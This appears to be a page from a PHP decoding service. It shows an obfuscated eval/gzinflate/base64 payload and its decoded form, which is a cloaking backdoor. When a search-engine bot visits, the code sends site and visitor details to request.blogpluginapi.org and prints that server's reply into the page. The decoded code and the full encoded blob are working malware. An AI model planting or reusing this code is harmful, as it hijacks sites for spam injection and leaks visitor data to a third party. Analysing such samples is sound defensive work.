Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(base64_decode("hVVtk5pIEP5sqvIfJpZ1A3uIaHTPaHmJtcvuprLZzSHcfUgsCrGBqWUZMgP7..

Decoded Output download

if(preg_match("!(googlebot|yahoo|msn|bing|slurp|bot|live)!", $_SERVER["HTTP_USER_AGENT"]))
{
	$auth_key=md5(time());
	
	$data=serialize(array(
		'host'=>$_SERVER['HTTP_HOST'],
		'page'=>md5($_SERVER['REQUEST_URI']),
		'ip'=>$_SERVER['REMOTE_ADDR'],
		'ua'=>$_SERVER["HTTP_USER_AGENT"],
	));
	
	$url = 'http://request.blogpluginapi.org/update.php?v=2&data='.urlencode(base64_encode($data));
	
	if (ini_get('allow_url_fopen') == '1')
	{
		if ($fp = @fopen($url, 'r'))
		{
			while ($line = fgets($fp, 1024))
			{
				$content .= $line;
			}
			echo $content;
		}
	}
	elseif(function_exists('curl_init'))
	{
		$ch = @curl_init($url);
		curl_setopt($ch, CURLOPT_HEADER, FALSE);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
		echo curl_exec($ch); curl_close($ch);
	}
	else
	{
		$parsedUrl = parse_url($url);
		$host = $parsedUrl['host'];
		
		if(isset($parsedUrl['path']))
		{
			$path = $parsedUrl['path'];
		}
		else
		{
			$path = '/';
		}
		
		if(isset($parsedUrl['query']))
		{
			$path .= '?' . $parsedUrl['query'];
		}
		if(isset($parsedUrl['port']))
		{
			$port = $parsedUrl['port'];
		}
		else
		{
			$port = '80';
		}
		
		$timeout = 20;
		$response = '';
		
		$fp = @fsockopen($host, '80', $errno, $errstr, $timeout );
		
		if( $fp )
		{
			fputs($fp, "GET $path HTTP/1.0
" . "Host: $host
" . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
" . "Accept: */*
" . "Accept-Language: en-us,en;q=0.5
" . "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
" . "Keep-Alive: 300
" . "Connection: keep-alive
" . "Referer: http://$host

");
			
			while ( $line = fread( $fp, 4096 ) )
			{
				$response .= $line;
			}
			
			fclose( $fp );
			
			$pos = strpos($response, "

");
			
			$response = substr($response, $pos + 4);
		}
		echo $response;
	}
}

Did this file decode correctly?

Original Code

eval(gzinflate(base64_decode("hVVtk5pIEP5sqvIfJpZ1A3uIaHTPaHmJtcvuprLZzSHcfUgsCrGBqWUZMgP7kjP/PTODIvFM3Qdl6H66n36bhkRaziD274MiTLT2Ky2mNE5hRYvNc5BQurnn2WZFsnjD05LlG6lIyQPor9oG6vgL2/nbdj63r1z3k++JN39+ad+47aWuv3zx78sXrU5QFol/B8+z+/VIK8g9aLo+FQqpWwdFMOPASJCSb6AFjAXPmlC0cEJ5gWd/1gRYEVzdLly8NBQiD2IQCOl1j3Lsvzx74fqe8x4v9QpI8p8cOfbHW9f25+fnzs5VGTQR/81FovZBlyxFM4STosgnvR6DryXwwlylNM7TMiZZkBOTsrhX5iI9MPMkf/swG/ymcsWmsIYspGvQVgGH06G/fVO1qElIhDSSET+GQsNBmtJHXxj6Ec0hwzqaCf4+FhVuyRIrdCfKRVTvFEKTMRoIMyy70KpArceEpCCAKclAQCPhm0szA/WtwbBCbqGtTkizArICmTOkDKZK/l39Q5hQtEMohZTLH6QcSKRFZRYWhGY+PBEuSHAogxf5FFVAiqQTJjLgWqWCVvm3lIxDQXMhDRMDnXnO9e0n17+y5+e2Y6CL+fXC/h+sY7uec+M685vFhbRxHW9rouJXdvAEobTSp9V7mFIOlaCRUR1xHjAOa0/1X51lUxpxd+TUCt0e+Lka5KVSV63SCBfhak1MHhQJXjZ71ZGiA08Vqq73LrQDC9zDe8gvGcXMsudjlKLf+C1GJjqC3vs9ngVlxaFLITrMQqF+nUVlgcfWQRoduTpoKZUDq6o2A57TjMthxriu8O4icBreVZdBtsBQLsXGAsYyWj15wcRh51dv9ghJL41MorzcXZb2pe2iqlhyUfT6pvWFfcnaombtK8E0QYqwlnliv3XnsbgqE/SRfiNpGvRGpoW0f0i2po98irwp2p7RjYtGZn+KIOt6iyliD5O+OTYt87WOLkHk0xtY1qk1HJyiC8Igok+CfiT1Nd08DCEXVCe9kwNZ9zrI4lJszYl0X3IDsunXmWWODnFniWyX8PF+cdsdj0dvun2jLKLuWMH/ME6qZ232ASDvzuVHYYJeW/tqnNEsA7UIJuhOYgKJqdUORMCATdB2k9ZlU4iqHa3m5kL16mIQrFWPDDS03pwiHf28verJOLa+qoZWV73qc4NKDCAXDGI0xEGrHYm2H42sOYO8XAmzpo1y9jsa6o1xV7tzB9lume8/AA==")));

Function Calls

gzinflate 1
base64_decode 1

Variables

None

Stats

MD5 086eab1a79f72cbd53f5e0a7acf473f1
Eval Count 1
Decode Time 72 ms